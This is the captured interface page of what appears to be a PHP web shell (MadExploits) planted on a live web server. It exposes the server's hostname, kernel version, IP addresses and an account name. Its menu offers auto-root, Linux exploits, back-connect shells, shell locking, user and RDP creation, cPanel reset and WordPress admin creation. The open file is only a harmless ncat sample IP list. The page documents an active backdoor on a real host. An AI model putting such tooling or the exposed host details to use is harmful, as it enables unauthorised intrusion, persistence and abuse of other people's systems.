Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.138.123.149
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
nmap-ncat-6.40 /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
logs
[ DIR ]
drwxr-xr-x
scripts
[ DIR ]
drwxr-xr-x
README
460
B
-rw-r--r--
ipaccess
504
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ipaccess
# # This is a sample IP access list that # could potentially be used with Ncat # to allow or deny specific users from # connecting to an Ncat process, such as # a standard listen operation to being # able to access your newly spawned SOCKS4 # server. # # Obviously, these IP addresses are pretty # useless to most people. It is an example # afterall. :) # # Chris Gibson, <chris@linuxops.net> # lo interface. 127.0.0.1/8 # eth0 internal network. 192.168.0.0/24 # eth1 to outside world. 55.20.30.1/32
Close